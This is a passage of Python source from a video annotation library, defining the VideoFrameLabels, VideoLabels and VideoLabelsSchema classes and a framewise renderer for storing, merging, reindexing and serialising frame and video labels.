            logger.info("Extracted video metadata: %s", str(metadata))
        return metadata
    @classmethod
    def from_stream_info(cls, stream_info):
        """Builds a VideoMetadata from a VideoStreamInfo.

        Args:
            stream_info: a VideoStreamInfo

        Returns:
            a VideoMetadata
        """
        return cls(
            frame_size=stream_info.frame_size,
            frame_rate=stream_info.frame_rate,
            total_frame_count=stream_info.total_frame_count,
            duration=stream_info.duration,
            size_bytes=stream_info.size_bytes,
            mime_type=stream_info.mime_type,
            encoding_str=stream_info.encoding_str,
        )
    @classmethod
    def from_dict(cls, d):
        """Constructs a VideoMetadata from a JSON dictionary."""
        start_time = d.get("start_time", None)
        if start_time is not None:
            start_time = dateutil.parser.parse(start_time)
        gps_waypoints = d.get("gps_waypoints", None)
        if isinstance(gps_waypoints, dict):
            gps_waypoints = etag.GPSWaypoints.from_dict(gps_waypoints)
        elif isinstance(gps_waypoints, list):
            #
            # This supports a list of GPSWaypoint instances rather than a
            # serialized GPSWaypoints instance, for backwards compatibility
            #
            points = [etag.GPSWaypoint.from_dict(p) for p in gps_waypoints]
            gps_waypoints = etag.GPSWaypoints(points=points)
        return cls(
            start_time=start_time,
            frame_size=d.get("frame_size", None),
            frame_rate=d.get("frame_rate", None),
            total_frame_count=d.get("total_frame_count", None),
            duration=d.get("duration", None),
            size_bytes=d.get("size_bytes", None),
            mime_type=d.get("mime_type", None),
            encoding_str=d.get("encoding_str", None),
            gps_waypoints=gps_waypoints,
        )
class VideoFrameLabels(FrameLabels):
    """FrameLabels for a specific frame of a video.

    VideoFrameLabels are spatial concepts that describe a collection of
    information about a specific frame in a video. VideoFrameLabels can have
    frame-level attributes, object detections, event detections, and
    segmentation masks.

    Attributes:
        frame_number: the frame number
        mask: (optional) a segmentation mask for the frame
        mask_index: (optional) a MaskIndex describing the semantics of the
            segmentation mask
        attrs: an AttributeContainer of attributes of the frame
        objects: a DetectedObjectContainer of objects in the frame
        keypoints: a KeypointsContainer of keypoints in the frame
        polylines: a PolylineContainer of polylines in the frame
        events: a DetectedEventContainer of events in the frame
    """

    # fields copied verbatim when building from other label containers
    _LABEL_FIELDS = (
        "mask",
        "mask_index",
        "attrs",
        "objects",
        "keypoints",
        "polylines",
        "events",
    )

    @classmethod
    def from_image_labels(cls, image_labels, frame_number):
        """Constructs a VideoFrameLabels from an ImageLabels.

        Args:
            image_labels: an ImageLabels
            frame_number: the frame number

        Returns:
            a VideoFrameLabels
        """
        kwargs = {f: getattr(image_labels, f) for f in cls._LABEL_FIELDS}
        return cls(frame_number=frame_number, **kwargs)

    @classmethod
    def from_frame_labels(cls, frame_labels):
        """Constructs a VideoFrameLabels from a FrameLabels.

        Args:
            frame_labels: a FrameLabels

        Returns:
            a VideoFrameLabels
        """
        kwargs = {f: getattr(frame_labels, f) for f in cls._LABEL_FIELDS}
        return cls(frame_number=frame_labels.frame_number, **kwargs)
class VideoLabels(
etal.Labels,
etal.HasLabelsSchema,
etal.HasLabelsSupport,
etal.HasFramewiseView,
etal.HasSpatiotemporalView,
):
"""Class encapsulating labels for a video.
VideoLabels are spatiotemporal concepts that describe the content of a
video. VideoLabels can have video-level attributes that apply to the entire
video, frame-level attributes, frame-level object detections, frame-level
keypoints/polylines/polygons/masks, frame-level event detections,
spatiotemporal objects, and spatiotemporal events.
Note that the VideoLabels class implements the `HasFramewiseView` and
`HasSpatiotemporalView` mixins. This means that all VideoLabels instances
can be rendered in both *framewise* and *spatiotemporal* format. Converting
between these formats is guaranteed to be lossless and idempotent.
In framewise format, VideoLabels store all information at the frame-level
in VideoFrameLabels. In particular, the following invariants will hold:
- The `attrs` field will be empty. All video-level attributes will be
stored as frame-level `Attribute`s in `frames` with
`constant == True`
        - The `objects` field will be empty. All video objects will be
            stored as frame-level `DetectedObject`s in the VideoFrameLabels
corresponding to the frames in which they are observed
        - The `events` field will be empty. All video events will be
            stored as frame-level `DetectedEvent`s in the VideoFrameLabels
corresponding to the frames in which they are observed
In spatiotemporal format, VideoLabels store all possible information in
the highest-available video construct. In particular, the following
invariants will hold:
- The `attrs` fields of all VideoFrameLabels will contain only
non-constant `Attribute`s. All constant attributes will be upgraded
to video-level attributes in the top-level `attrs` field
- The `objects` fields of all VideoFrameLabels will be empty. All
objects will be stored as `VideoObject`s in the top-level `objects`
field. Detections for objects with `index`es will be collected in a
single VideoObject, and each DetectedObject without an index will be
given its own VideoObject. Additionally, all constant attributes of
`DetectedObject`s will be upgraded to object-level attributes in
their parent VideoObject
- The `events` fields of all VideoFrameLabels will be empty. All
events will be stored as `VideoEvent`s in the top-level `events`
field. Detections for events with `index`es will be collected in a
single VideoEvent, and each DetectedEvent without an index will be
given its own VideoEvent. Additionally, all objects (and their
constant attributes) within events will be upgraded to `VideoObject`s
using the strategy described in the previous bullet point
Attributes:
filename: (optional) the filename of the video
metadata: (optional) a VideoMetadata of metadata about the video
support: a FrameRanges instance describing the support of the labels
mask_index: (optional) a MaskIndex describing the semantics of all
segmentation masks in the video
attrs: an AttributeContainer of video-level attributes
frames: a SortedDict mapping frame numbers to VideoFrameLabels
objects: a VideoObjectContainer of objects
events: a VideoEventContainer of events
schema: (optional) a VideoLabelsSchema describing the video's schema
"""
    def __init__(
        self,
        filename=None,
        metadata=None,
        support=None,
        mask_index=None,
        attrs=None,
        frames=None,
        objects=None,
        events=None,
        schema=None,
    ):
        """Creates a VideoLabels instance.

        Args:
            filename: (optional) the filename of the video
            metadata: (optional) a VideoMetadata of metadata about the video
            support: (optional) a FrameRanges instance describing the frozen
                support of the labels
            mask_index: (optional) a MaskIndex describing the semantics of all
                segmentation masks in the video
            attrs: (optional) an AttributeContainer of video-level attributes
            frames: (optional) a dictionary mapping frame numbers to
                VideoFrameLabels
            objects: (optional) a VideoObjectContainer of objects
            events: (optional) a VideoEventContainer of events
            schema: (optional) a VideoLabelsSchema to enforce on the video
        """
        self.filename = filename
        self.metadata = metadata
        self.mask_index = mask_index
        # default to empty containers so callers can always append
        self.attrs = attrs or etad.AttributeContainer()
        # SortedDict keeps frame numbers in ascending order for iteration
        self.frames = SortedDict(frames or {})
        self.objects = objects or etao.VideoObjectContainer()
        self.events = events or etae.VideoEventContainer()
        # initialize the schema/support mixins explicitly
        etal.HasLabelsSchema.__init__(self, schema=schema)
        etal.HasLabelsSupport.__init__(self, support=support)
    def __getitem__(self, frame_number):
        """Gets the VideoFrameLabels for the given frame number, or an empty
        one if no VideoFrameLabels exists.

        Args:
            frame_number: the frame number

        Returns:
            a VideoFrameLabels
        """
        # delegates to get_frame(), which never raises for missing frames
        return self.get_frame(frame_number)
    def __setitem__(self, frame_number, frame_labels):
        """Sets the VideoFrameLabels for the given frame number.

        If a VideoFrameLabels already exists for the frame, it is overwritten.

        Args:
            frame_number: the frame number
            frame_labels: a VideoFrameLabels
        """
        # stamp the frame number onto the labels before storing
        frame_labels.frame_number = frame_number
        self.add_frame(frame_labels, overwrite=True)
    def __delitem__(self, frame_number):
        """Deletes the VideoFrameLabels for the given frame number.

        Args:
            frame_number: the frame number
        """
        self.delete_frame(frame_number)
    def __iter__(self):
        """Returns an iterator over the frames with VideoFrameLabels.

        The frames are traversed in sorted order.

        Returns:
            an iterator over frame numbers
        """
        # iterating the SortedDict yields frame numbers in ascending order
        return iter(self.frames)
    def iter_attributes(self):
        """Returns an iterator over the video-level attributes in the video.

        Returns:
            an iterator over `Attribute`s
        """
        return iter(self.attrs)
    def iter_video_objects(self):
        """Returns an iterator over the `VideoObject`s in the video.

        Returns:
            an iterator over `VideoObject`s
        """
        return iter(self.objects)
    def iter_video_events(self):
        """Returns an iterator over the `VideoEvent`s in the video.

        Returns:
            an iterator over `VideoEvent`s
        """
        return iter(self.events)
    def iter_frames(self):
        """Returns an iterator over the VideoFrameLabels in the video.

        The frames are traversed in sorted order.

        Returns:
            an iterator over VideoFrameLabels
        """
        # SortedDict values come back in frame-number order
        return itervalues(self.frames)
    @property
    def framewise_renderer_cls(self):
        """The LabelsFrameRenderer class used by this class."""
        return VideoLabelsFrameRenderer
    @property
    def spatiotemporal_renderer_cls(self):
        """The LabelsSpatiotemporalRenderer class used by this class."""
        return VideoLabelsSpatiotemporalRenderer
    @property
    def has_filename(self):
        """Whether the video has a filename (i.e., `filename` is set)."""
        return self.filename is not None
    @property
    def has_metadata(self):
        """Whether the video has metadata (i.e., `metadata` is set)."""
        return self.metadata is not None
    @property
    def has_mask_index(self):
        """Whether the video has a video-wide frame segmentation mask index."""
        return self.mask_index is not None
    @property
    def has_video_attributes(self):
        """Whether the video has at least one video-level attribute."""
        # truthiness of the AttributeContainer reflects non-emptiness
        return bool(self.attrs)
@property
def has_frame_attributes(self):
"""Whether the video has at least one frame-level attribute."""
for frame_number in self:
if self[frame_number].has_frame_attributes:
return True
return False
    @property
    def has_attributes(self):
        """Whether the video has video- or frame-level attributes."""
        return self.has_video_attributes or self.has_frame_attributes
    @property
    def has_video_objects(self):
        """Whether the video has at least one VideoObject."""
        return bool(self.objects)
@property
def has_detected_objects(self):
"""Whether the video has at least one frame-level DetectedObject."""
for frame_labels in self.iter_frames():
if frame_labels.has_objects:
return True
return False
    @property
    def has_objects(self):
        """Whether the video has at least one VideoObject or DetectedObject."""
        return self.has_video_objects or self.has_detected_objects
    @property
    def has_video_events(self):
        """Whether the video has at least one VideoEvent."""
        return bool(self.events)
@property
def has_detected_events(self):
"""Whether the video has at least one frame-level DetectedEvent."""
for frame_labels in self.iter_frames():
if frame_labels.has_events:
return True
return False
    @property
    def has_events(self):
        """Whether the video has at least one VideoEvent or DetectedEvent."""
        return self.has_video_events or self.has_detected_events
@property
def has_keypoints(self):
"""Whether the video has at least one frame with keypoints."""
for frame_labels in self.iter_frames():
if frame_labels.has_keypoints:
return True
return False
@property
def has_polylines(self):
"""Whether the video has at least one frame with polylines."""
for frame_labels in self.iter_frames():
if frame_labels.has_polylines:
return True
return False
@property
def has_frame_labels(self):
"""Whether the video has at least one VideoFrameLabels."""
return bool(self.frames)
@property
def is_empty(self):
"""Whether the video has no labels of any kind."""
return not (
self.has_video_attributes
or self.has_frame_attributes
or self.has_video_objects
or self.has_video_events
or self.has_frame_labels
)
@property
def num_frames(self):
"""The number of frames with VideoFrameLabels."""
return len(self.frames)
def has_frame(self, frame_number):
"""Determines whether this object contains a VideoFrameLabels for the
given frame number.
Args:
frame_number: the frame number
Returns:
True/False
"""
return frame_number in self.frames
def get_frame(self, frame_number):
"""Gets the VideoFrameLabels for the given frame number, or an empty
VideoFrameLabels if one does not yet exist.
Args:
frame_number: the frame number
Returns:
a VideoFrameLabels
"""
try:
return self.frames[frame_number]
except KeyError:
return VideoFrameLabels(frame_number=frame_number)
def delete_frame(self, frame_number):
"""Deletes the VideoFrameLabels for the given frame number.
Args:
frame_number: the frame number
"""
del self.frames[frame_number]
def get_frame_numbers_with_labels(self):
"""Returns a sorted list of all frames with VideoFrameLabels.
Returns:
a list of frame numbers
"""
return list(self.frames.keys())
def get_frame_numbers_with_masks(self):
"""Returns a sorted list of frames with frame-level masks.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_mask]
def get_frame_numbers_with_attributes(self):
"""Returns a sorted list of frames with one or more frame-level
attributes.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_frame_attributes]
def get_frame_numbers_with_objects(self):
"""Returns a sorted list of frames with one or more `DetectedObject`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_objects]
def get_frame_numbers_with_keypoints(self):
"""Returns a sorted list of frames with frame-level `Keypoints`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_keypoints]
def get_frame_numbers_with_polylines(self):
"""Returns a sorted list of frames with frame-level `Polyline`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_polylines]
def get_frame_numbers_with_events(self):
"""Returns a sorted list of frames with one or more `DetectedEvent`s.
Returns:
a list of frame numbers
"""
return [fn for fn in self if self[fn].has_events]
def get_object_indexes(self):
"""Returns the set of `index`es of all objects in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
obj_indexes = self.objects.get_indexes()
obj_indexes.update(self.events.get_object_indexes())
for frame_labels in self.iter_frames():
obj_indexes.update(frame_labels.get_object_indexes())
return obj_indexes
def offset_object_indexes(self, offset):
"""Adds the given offset to all objects with `index`es in the video.
Args:
offset: the integer offset
"""
self.objects.offset_indexes(offset)
self.events.offset_object_indexes(offset)
for frame_labels in self.iter_frames():
frame_labels.offset_object_indexes(offset)
def clear_object_indexes(self):
"""Clears the `index` of all objects in the video."""
self.objects.clear_indexes()
self.events.clear_object_indexes()
for frame_labels in self.iter_frames():
frame_labels.clear_object_indexes()
def get_keypoints_indexes(self):
"""Returns the set of `index`es of all keypoints in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
keypoints_indexes = set()
for frame_labels in self.iter_frames():
keypoints_indexes.update(frame_labels.get_keypoints_indexes())
return keypoints_indexes
def offset_keypoints_indexes(self, offset):
"""Adds the given offset to all keypoints with `index`es in the video.
Args:
offset: the integer offset
"""
for frame_labels in self.iter_frames():
frame_labels.offset_keypoints_indexes(offset)
def clear_keypoints_indexes(self):
"""Clears the `index` of all keypoints in the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_keypoints_indexes()
def get_polyline_indexes(self):
"""Returns the set of `index`es of all polylines in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
polyline_indexes = set()
for frame_labels in self.iter_frames():
polyline_indexes.update(frame_labels.get_polyline_indexes())
return polyline_indexes
def offset_polyline_indexes(self, offset):
"""Adds the given offset to all polylines with `index`es in the video.
Args:
offset: the integer offset
"""
for frame_labels in self.iter_frames():
frame_labels.offset_polyline_indexes(offset)
def clear_polyline_indexes(self):
"""Clears the `index` of all polylines in the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_polyline_indexes()
def get_event_indexes(self):
"""Returns the set of `index`es of all events in the video.
`None` indexes are omitted.
Returns:
a set of indexes
"""
event_indexes = self.events.get_indexes()
for frame_labels in self.iter_frames():
event_indexes.update(frame_labels.get_event_indexes())
return event_indexes
def offset_event_indexes(self, offset):
"""Adds the given offset to all events with `index`es in the video.
Args:
offset: the integer offset
"""
self.events.offset_indexes(offset)
for frame_labels in self.iter_frames():
frame_labels.offset_event_indexes(offset)
def clear_event_indexes(self):
"""Clears the `index` of all events in the video."""
self.events.clear_indexes()
for frame_labels in self.iter_frames():
frame_labels.clear_event_indexes()
def add_video_attribute(self, attr):
"""Adds the given video-level attribute to the video.
Args:
attr: an Attribute
"""
self.attrs.add(attr)
def add_video_attributes(self, attrs):
"""Adds the given video-level attributes to the video.
Args:
attrs: an AttributeContainer
"""
self.attrs.add_container(attrs)
def add_frame(self, frame_labels, frame_number=None, overwrite=True):
"""Adds the frame labels to the video.
Args:
frame_labels: a FrameLabels instance
frame_number: an optional frame number. If not specified, the
FrameLabels must have its `frame_number` set
overwrite: whether to overwrite any existing VideoFrameLabels
instance for the frame or merge the new labels. By default,
this is True
"""
self._add_frame_labels(frame_labels, frame_number, overwrite)
def add_frame_attribute(self, attr, frame_number):
"""Adds the given frame-level attribute to the video.
Args:
attr: an Attribute
frame_number: the frame number
"""
self._ensure_frame(frame_number)
self.frames[frame_number].add_attribute(attr)
def add_frame_attributes(self, attrs, frame_number):
"""Adds the given frame-level attributes to the video.
Args:
attrs: an AttributeContainer
frame_number: the frame number
"""
self._ensure_frame(frame_number)
self.frames[frame_number].add_attributes(attrs)
def add_object(self, obj, frame_number=None):
"""Adds the object to the video.
Args:
obj: a VideoObject or DetectedObject
frame_number: (DetectedObject only) the frame number. If omitted,
the DetectedObject must have its `frame_number` set
"""
if isinstance(obj, etao.DetectedObject):
self._add_detected_object(obj, frame_number)
else:
self.objects.add(obj)
def add_objects(self, objects, frame_number=None):
"""Adds the objects to the video.
Args:
objects: a VideoObjectContainer or DetectedObjectContainer
frame_number: (DetectedObjectContainer only) the frame number. If
omitted, the DetectedObjects must have their `frame_number` set
"""
if isinstance(objects, etao.DetectedObjectContainer):
self._add_detected_objects(objects, frame_number)
else:
self.objects.add_container(objects)
def add_event(self, event, frame_number=None):
"""Adds the event to the video.
Args:
event: a VideoEvent or DetectedEvent
frame_number: (DetectedEvent only) the frame number. If omitted,
the DetectedEvent must have its `frame_number` set
"""
if isinstance(event, etae.DetectedEvent):
self._add_detected_event(event, frame_number)
else:
self.events.add(event)
def add_events(self, events, frame_number=None):
"""Adds the events to the video.
Args:
events: a VideoEventContainer or DetectedEventContainer
frame_number: (DetectedEventContainer only) the frame number. If
omitted, the `DetectedEvent`s must have their `frame_number`s
set
"""
if isinstance(events, etae.DetectedEventContainer):
self._add_detected_events(events, frame_number)
else:
self.events.add_container(events)
def clear_video_attributes(self):
"""Removes all video-level attributes from the video."""
self.attrs = etad.AttributeContainer()
def clear_frame_attributes(self):
"""Removes all frame-level attributes from the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_frame_attributes()
def clear_video_objects(self):
"""Removes all `VideoObject`s from the video."""
self.objects = etao.VideoObjectContainer()
def clear_detected_objects(self):
"""Removes all `DetectedObject`s from the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_objects()
def clear_objects(self):
"""Removes all `VideoObject`s and `DetectedObject`s from the video."""
self.clear_video_objects()
self.clear_detected_objects()
def clear_video_events(self):
"""Removes all `VideoEvent`s from the video."""
self.events = etae.VideoEventContainer()
def clear_detected_events(self):
"""Removes all `DetectedEvent`s from the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_events()
def clear_events(self):
"""Removes all `VideoEvent`s and `DetectedEvent`s from the video."""
self.clear_video_events()
self.clear_detected_events()
def clear_frames(self):
"""Removes all VideoFrameLabels from the video."""
self.frames.clear()
def remove_empty_frames(self):
"""Removes all empty VideoFrameLabels from the video."""
self.frames = SortedDict(
{fn: vfl for fn, vfl in iteritems(self.frames) if not vfl.is_empty}
)
    def merge_labels(self, video_labels, reindex=False):
        """Merges the given VideoLabels into this labels.
        Args:
            video_labels: a VideoLabels
            reindex: whether to offset the `index` fields of objects,
                polylines, keypoints, and events in `video_labels` before
                merging so that all indexes are unique. The default is False
        """
        # Reindexing must happen BEFORE any labels are merged, so that the
        # incoming indexes are shifted past the maximum existing indexes
        if reindex:
            self._reindex_objects(video_labels)
            self._reindex_keypoints(video_labels)
            self._reindex_polylines(video_labels)
            self._reindex_events(video_labels)
        # Merge metadata
        # Scalar metadata fields are only adopted when this instance does not
        # already have them; existing values always win
        if video_labels.has_filename and not self.has_filename:
            self.filename = video_labels.filename
        if video_labels.has_metadata and not self.has_metadata:
            self.metadata = video_labels.metadata
        # Supports are merged whenever either side has an explicitly frozen
        # support; otherwise supports remain lazily computed
        if self.is_support_frozen or video_labels.is_support_frozen:
            self.merge_support(video_labels.support)
        if video_labels.has_mask_index and not self.has_mask_index:
            self.mask_index = video_labels.mask_index
        if video_labels.has_schema:
            if self.has_schema:
                self.schema.merge_schema(video_labels.schema)
            else:
                self.schema = video_labels.schema
        # Merge labels
        self.add_video_attributes(video_labels.attrs)
        self.add_objects(video_labels.objects)
        self.add_events(video_labels.events)
        # `overwrite=False` merges incoming frame labels into any existing
        # frames rather than replacing them
        for frame_labels in video_labels.iter_frames():
            self.add_frame(frame_labels, overwrite=False)
def filter_by_schema(self, schema):
"""Filters the labels by the given schema.
Args:
schema: a VideoLabelsSchema
"""
self.attrs.filter_by_schema(schema.attrs)
self.objects.filter_by_schema(schema.objects)
self.events.filter_by_schema(schema.events)
for frame_labels in self.iter_frames():
frame_labels.filter_by_schema(schema)
def remove_objects_without_attrs(self, labels=None):
"""Removes objects from the VideoLabels that do not have attributes.
Args:
labels: an optional list of object label strings to which to
restrict attention when filtering. By default, all objects are
processed
"""
self.objects.remove_objects_without_attrs(labels=labels)
self.events.remove_objects_without_attrs(labels=labels)
for frame_labels in self.iter_frames():
frame_labels.remove_objects_without_attrs(labels=labels)
def attributes(self):
"""Returns the list of class attributes that will be serialized.
Returns:
a list of attributes
"""
_attrs = []
if self.filename:
_attrs.append("filename")
if self.metadata:
_attrs.append("metadata")
if self.has_schema:
_attrs.append("schema")
if self.is_support_frozen:
_attrs.append("support")
if self.has_mask_index:
_attrs.append("mask_index")
if self.attrs:
_attrs.append("attrs")
if self.frames:
_attrs.append("frames")
if self.objects:
_attrs.append("objects")
if self.events:
_attrs.append("events")
return _attrs
@classmethod
def from_objects(cls, objects):
"""Builds a VideoLabels instance from a container of objects.
If a DetectedObjectContainer is provided, the `DetectedObject`s must
have their `frame_number`s set.
Args:
objects: a VideoObjectContainer or DetectedObjectContainer
Returns:
a VideoLabels
"""
labels = cls()
labels.add_objects(objects)
return labels
@classmethod
def from_events(cls, events):
"""Builds a VideoLabels instance from an event container.
If a DetectedEventContainer is provided, the `DetectedEvent`s must
have their `frame_number`s set.
Args:
events: a VideoEventContainer or DetectedEventContainer
Returns:
a VideoLabels
"""
labels = cls()
labels.add_events(events)
return labels
@classmethod
def from_dict(cls, d):
"""Constructs a VideoLabels from a JSON dictionary.
Args:
d: a JSON dictionary
Returns:
a VideoLabels
"""
filename = d.get("filename", None)
metadata = d.get("metadata", None)
if metadata is not None:
metadata = VideoMetadata.from_dict(metadata)
support = d.get("support", None)
if support is not None:
support = etaf.FrameRanges.from_dict(support)
mask_index = d.get("mask_index", None)
if mask_index is not None:
mask_index = etad.MaskIndex.from_dict(mask_index)
attrs = d.get("attrs", None)
if attrs is not None:
attrs = etad.AttributeContainer.from_dict(attrs)
frames = d.get("frames", None)
if frames is not None:
frames = {
int(fn): VideoFrameLabels.from_dict(vfl)
for fn, vfl in iteritems(frames)
}
objects = d.get("objects", None)
if objects is not None:
objects = etao.VideoObjectContainer.from_dict(objects)
events = d.get("events", None)
if events is not None:
events = etae.VideoEventContainer.from_dict(events)
schema = d.get("schema", None)
if schema is not None:
schema = VideoLabelsSchema.from_dict(schema)
return cls(
filename=filename,
metadata=metadata,
support=support,
mask_index=mask_index,
attrs=attrs,
frames=frames,
objects=objects,
events=events,
schema=schema,
)
def _ensure_frame(self, frame_number):
if not self.has_frame(frame_number):
self.frames[frame_number] = VideoFrameLabels(
frame_number=frame_number
)
def _add_detected_object(self, obj, frame_number):
if frame_number is None:
if not obj.has_frame_number:
raise ValueError(
"Either `frame_number` must be provided or the "
"DetectedObject must have its `frame_number` set"
)
frame_number = obj.frame_number
obj.frame_number = frame_number
self._ensure_frame(frame_number)
self.frames[frame_number].add_object(obj)
def _add_detected_objects(self, objects, frame_number):
for obj in objects:
self._add_detected_object(obj, frame_number)
def _add_detected_event(self, event, frame_number):
if frame_number is None:
if not event.has_frame_number:
raise ValueError(
"Either `frame_number` must be provided or the "
"DetectedEvent must have its `frame_number` set"
)
frame_number = event.frame_number
event.frame_number = frame_number
self._ensure_frame(frame_number)
self.frames[frame_number].add_event(event)
def _add_detected_events(self, events, frame_number):
for event in events:
self._add_detected_event(event, frame_number)
def _add_frame_labels(self, frame_labels, frame_number, overwrite):
if frame_number is None:
if not frame_labels.has_frame_number:
raise ValueError(
"Either `frame_number` must be provided or the "
"FrameLabels must have its `frame_number` set"
)
frame_number = frame_labels.frame_number
if overwrite or not self.has_frame(frame_number):
if not isinstance(frame_labels, VideoFrameLabels):
frame_labels = VideoFrameLabels.from_frame_labels(frame_labels)
frame_labels.frame_number = frame_number
self.frames[frame_number] = frame_labels
else:
self.frames[frame_number].merge_labels(frame_labels)
def _compute_support(self):
frame_ranges = etaf.FrameRanges.from_iterable(self.frames.keys())
frame_ranges.merge(*[obj.support for obj in self.objects])
frame_ranges.merge(*[event.support for event in self.events])
return frame_ranges
def _reindex_objects(self, video_labels):
self_indexes = self.get_object_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_object_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_object_indexes(offset)
def _reindex_keypoints(self, video_labels):
self_indexes = self.get_keypoints_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_keypoints_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_keypoints_indexes(offset)
def _reindex_polylines(self, video_labels):
self_indexes = self.get_polyline_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_polyline_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_polyline_indexes(offset)
def _reindex_events(self, video_labels):
self_indexes = self.get_event_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_event_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_event_indexes(offset)
class VideoLabelsSchema(FrameLabelsSchema):
    """Schema describing the content of one or more VideoLabels.
    VideoLabelsSchema introduces the term "video-level attribute", which is
    merely an alias for the term "constant frame attribute" as used in
    `FrameLabelsSchema`s.
    Attributes:
        attrs: an AttributeContainerSchema describing the video-level
            attributes of the video(s)
        frames: an AttributeContainerSchema describing the frame-level
            attributes of the video(s)
        objects: an ObjectContainerSchema describing the objects of the
            video(s)
        keypoints: a KeypointsContainerSchema describing the keypoints of the
            video(s)
        polylines: a PolylineContainerSchema describing the polylines of the
            video(s)
        events: an EventContainerSchema describing the events of the video(s)
    """
    @property
    def has_video_attributes(self):
        """Whether the schema has at least one video-level AttributeSchema.
        This property is an alias for `has_constant_attributes`.
        """
        return self.has_constant_attributes
    def has_video_attribute(self, attr_name):
        """Whether the schema has a video-level attribute with the given name.
        This method is an alias for `has_constant_attribute()`.
        Args:
            attr_name: the video-level attribute name
        Returns:
            True/False
        """
        return self.has_constant_attribute(attr_name)
    def get_video_attribute_schema(self, attr_name):
        """Gets the AttributeSchema for the video-level attribute with the
        given name.
        This method is an alias for `get_constant_attribute_schema()`.
        Args:
            attr_name: the video-level attribute name
        Returns:
            the AttributeSchema
        """
        return self.get_constant_attribute_schema(attr_name)
    def get_video_attribute_class(self, attr_name):
        """Gets the Attribute class for the video-level attribute with the
        given name.
        This method is an alias for `get_constant_attribute_class()`.
        Args:
            attr_name: the video-level attribute name
        Returns:
            the Attribute class
        """
        return self.get_constant_attribute_class(attr_name)
    def add_video_attribute(self, attr):
        """Adds the given video-level attribute to the schema.
        This method is an alias for `add_constant_attribute()`.
        Args:
            attr: an Attribute
        """
        self.add_constant_attribute(attr)
    def add_video_attributes(self, attrs):
        """Adds the given video-level attributes to the schema.
        This method is an alias for `add_constant_attributes()`.
        Args:
            attrs: an AttributeContainer
        """
        self.add_constant_attributes(attrs)
    def is_valid_video_attribute(self, attr):
        """Whether the video-level attribute is compliant with the schema.
        This method is an alias for `is_valid_constant_attribute()`.
        Args:
            attr: an Attribute
        Returns:
            True/False
        """
        return self.is_valid_constant_attribute(attr)
    def is_valid_video_attributes(self, attrs):
        """Whether the video-level attributes are compliant with the schema.
        This method is an alias for `is_valid_constant_attributes()`.
        Args:
            attrs: an AttributeContainer
        Returns:
            True/False
        """
        return self.is_valid_constant_attributes(attrs)
    def validate_video_attribute(self, attr):
        """Validates that the video-level attribute is compliant with the
        schema.
        This method is an alias for `validate_constant_attribute()`.
        Args:
            attr: an Attribute
        Raises:
            LabelsSchemaError: if the attribute violates the schema
        """
        self.validate_constant_attribute(attr)
    def validate_video_attributes(self, attrs):
        """Validates that the video-level attributes are compliant with the
        schema.
        This method is an alias for `validate_constant_attributes()`.
        Args:
            attrs: an AttributeContainer
        Raises:
            LabelsSchemaError: if the attributes violate the schema
        """
        self.validate_constant_attributes(attrs)
    def validate(self, video_labels):
        """Validates that the video labels are compliant with the schema.
        Args:
            video_labels: a VideoLabels
        Raises:
            LabelsSchemaError: if the labels violate the schema
        """
        self.validate_video_labels(video_labels)
    @classmethod
    def build_active_schema(cls, video_labels):
        """Builds a VideoLabelsSchema that describes the active schema of the
        given labels.
        Args:
            video_labels: a VideoLabels
        Returns:
            a VideoLabelsSchema
        """
        return cls.build_active_schema_for_video_labels(video_labels)
class VideoLabelsFrameRenderer(etal.LabelsFrameRenderer):
    """Class for rendering VideoLabels at the frame-level.
    See the VideoLabels class docstring for the framewise format spec.
    """
    _LABELS_CLS = VideoLabels
    _FRAME_LABELS_CLS = VideoFrameLabels
    def __init__(self, video_labels):
        """Creates a VideoLabelsFrameRenderer instance.
        Args:
            video_labels: a VideoLabels
        """
        self._video_labels = video_labels
    def render(self, in_place=False):
        """Renders the VideoLabels in framewise format.
        Args:
            in_place: whether to perform the rendering in-place. By default,
                this is False
        Returns:
            a VideoLabels
        """
        labels = self._video_labels
        frames = self.render_all_frames(in_place=in_place)
        if in_place:
            # Render in-place
            # All video-level content has been pushed down into `frames`, so
            # clear it from the top-level labels before swapping in the new
            # frame map
            labels.clear_video_attributes()
            labels.clear_video_objects()
            labels.clear_video_events()
            labels.clear_frames()
            labels.frames = frames
            return labels
        # Render new copy of labels
        filename = deepcopy(labels.filename)
        metadata = deepcopy(labels.metadata)
        if labels.is_support_frozen:
            # Only carry over the support if it was explicitly frozen
            support = deepcopy(labels.support)
        else:
            support = None
        mask_index = deepcopy(labels.mask_index)
        schema = deepcopy(labels.schema)
        return VideoLabels(
            filename=filename,
            metadata=metadata,
            support=support,
            mask_index=mask_index,
            frames=frames,
            schema=schema,
        )
    def render_frame(self, frame_number, in_place=False):
        """Renders the VideoLabels for the given frame.
        Args:
            frame_number: the frame number
            in_place: whether to perform the rendering in-place (i.e., without
                deep copying objects). By default, this is False
        Returns:
            a VideoFrameLabels, or None if no labels exist for the given frame
        """
        if frame_number not in self._video_labels.support:
            return None
        video_attrs = self._get_video_attrs()
        dobjs = self._render_object_frame(frame_number, in_place)
        devents = self._render_event_frame(frame_number, in_place)
        return self._render_frame(
            frame_number, video_attrs, dobjs, devents, in_place
        )
    def render_all_frames(self, in_place=False):
        """Renders the VideoLabels for all possible frames.
        Args:
            in_place: whether to perform the rendering in-place (i.e., without
